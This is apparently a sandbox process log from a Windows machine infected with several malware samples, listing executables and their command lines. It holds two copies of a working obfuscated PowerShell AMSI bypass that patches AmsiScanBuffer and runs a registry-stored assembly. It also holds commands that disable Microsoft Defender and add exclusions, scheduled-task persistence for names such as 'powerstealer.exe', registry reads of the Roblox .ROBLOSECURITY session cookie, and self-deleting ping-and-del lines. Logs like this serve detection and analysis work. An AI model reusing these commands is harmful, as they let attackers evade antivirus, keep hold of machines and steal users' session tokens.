C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IhIYpxIFcgyp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iGdgBFEJVNdXFn,[Parameter(Position=1)][Type]$cORkSOTPZP)$iSTiIuxtnsW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+'d'+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'le'+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$iSTiIuxtnsW.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eBy'+[Char](83)+''+'i'+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iGdgBFEJVNdXFn).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+'g'+'e'+[Char](100)+'');$iSTiIuxtnsW.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+'w'+[Char](83)+'l'+[Char](111)+'t'+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$cORkSOTPZP,$iGdgBFEJVNdXFn).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $iSTiIuxtnsW.CreateType();}$nlvkduqkZTZcW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+[Char](101)+'m.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'tho'+'d'+''+'s'+'');$bgERocHrCpJknq=$nlvkduqkZTZcW.GetMethod(''+[Char](71)+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DTpbqLEALYnZDkiwoQJ=IhIYpxIFcgyp @([String])([IntPtr]);$ZGluQFTyjlPvCkISWArwNu=IhIYpxIFcgyp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PNhUhOubGQt=$nlvkduqkZTZcW.GetMethod(''+'G'+'etM'+[Char](111)+'du'+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+[Char](108)+'')));$EPAqehSgElyedt=$bgERocHrCpJknq.Invoke($Null,@([Object]$PNhUhOubGQt,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'yA')));$nzQbtsGqlAJGwXnHA=$bgERocHrCpJknq.Invoke($Null,@([Object]$PNhUhOubGQt,[Object]('Vir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+'e'+'c'+'t'+'')));$fsdzaNt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EPAqehSgElyedt,$DTpbqLEALYnZDkiwoQJ).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$QoEpoKCnSzvHdWsxV=$bgERocHrCpJknq.Invoke($Null,@([Object]$fsdzaNt,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+'ff'+'e'+'r')));$tMmAECOwaM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nzQbtsGqlAJGwXnHA,$ZGluQFTyjlPvCkISWArwNu).Invoke($QoEpoKCnSzvHdWsxV,[uint32]8,4,[ref]$tMmAECOwaM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QoEpoKCnSzvHdWsxV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nzQbtsGqlAJGwXnHA,$ZGluQFTyjlPvCkISWArwNu).Invoke($QoEpoKCnSzvHdWsxV,[uint32]8,0x20,[ref]$tMmAECOwaM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'r'+'ut'+[Char](115)+'s'+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a5fe6155-dd2c-4481-8307-6c530f1c484b}

C:\Windows\system32\lsass.exe

"C:\Windows\system32\lsass.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im conhost.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\info.exe

"C:\Users\Admin\AppData\Local\Temp\a\info.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Windows\SysWOW64\ruts\11.reg

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Users\Admin\AppData\Local\Temp\a\50.exe

"C:\Users\Admin\AppData\Local\Temp\a\50.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c delete.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cbKEIYxfLOuZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zkkByHJHlOEUfI,[Parameter(Position=1)][Type]$jNXhuSJyuE)$kuXhIwXmRtq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+[Char](108)+''+[Char](97)+'ss,P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,'+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+'o'+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$kuXhIwXmRtq.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'By'+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](80)+'ublic',[Reflection.CallingConventions]::Standard,$zkkByHJHlOEUfI).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',Ma'+'n'+'age'+[Char](100)+'');$kuXhIwXmRtq.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+'Sig'+[Char](44)+''+[Char](78)+''+'e'+'wS'+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+''+[Char](108)+'',$jNXhuSJyuE,$zkkByHJHlOEUfI).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+[Char](100)+'');Write-Output $kuXhIwXmRtq.CreateType();}$TowgBpqykWRdH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$gZEYvIJFLLvQLY=$TowgBpqykWRdH.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c,S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aIHWGzmkcfbXwgMKaID=cbKEIYxfLOuZ @([String])([IntPtr]);$MbJXigrefTaFlOHFefPhpV=cbKEIYxfLOuZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QlXnRBRAGji=$TowgBpqykWRdH.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+'l'+'32'+[Char](46)+'d'+[Char](108)+''+'l'+'')));$MdhHeMtBjRszmk=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$QlXnRBRAGji,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$XUXWoQgqYfzJkHLAq=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$QlXnRBRAGji,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$Aoekwpv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MdhHeMtBjRszmk,$aIHWGzmkcfbXwgMKaID).Invoke('a'+[Char](109)+'si'+[Char](46)+'d'+'l'+''+'l'+'');$ywzeyZnIMfSbWqxrx=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$Aoekwpv,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$fcObEGUKYy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XUXWoQgqYfzJkHLAq,$MbJXigrefTaFlOHFefPhpV).Invoke($ywzeyZnIMfSbWqxrx,[uint32]8,4,[ref]$fcObEGUKYy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ywzeyZnIMfSbWqxrx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XUXWoQgqYfzJkHLAq,$MbJXigrefTaFlOHFefPhpV).Invoke($ywzeyZnIMfSbWqxrx,[uint32]8,0x20,[ref]$fcObEGUKYy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+'s'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"

C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"

C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"

C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe

"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"

C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe

"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1324 -s 320

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 608 -p 3520 -ip 3520

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3520 -s 2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe

"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k swprv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2324 -ip 2324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1200

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{bbdceaac-ed42-4d86-a1df-4449fb89d1a3}

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7D5ABB851EBB1EA598FA427462D75E36

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4820 -ip 4820

C:\Users\Admin\AppData\Local\Temp\a\jy.exe

"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp" /SL5="$E01EA,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1292

C:\Users\Admin\AppData\Local\Temp\a\test30.exe

"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"

C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe

"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe

"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"

C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

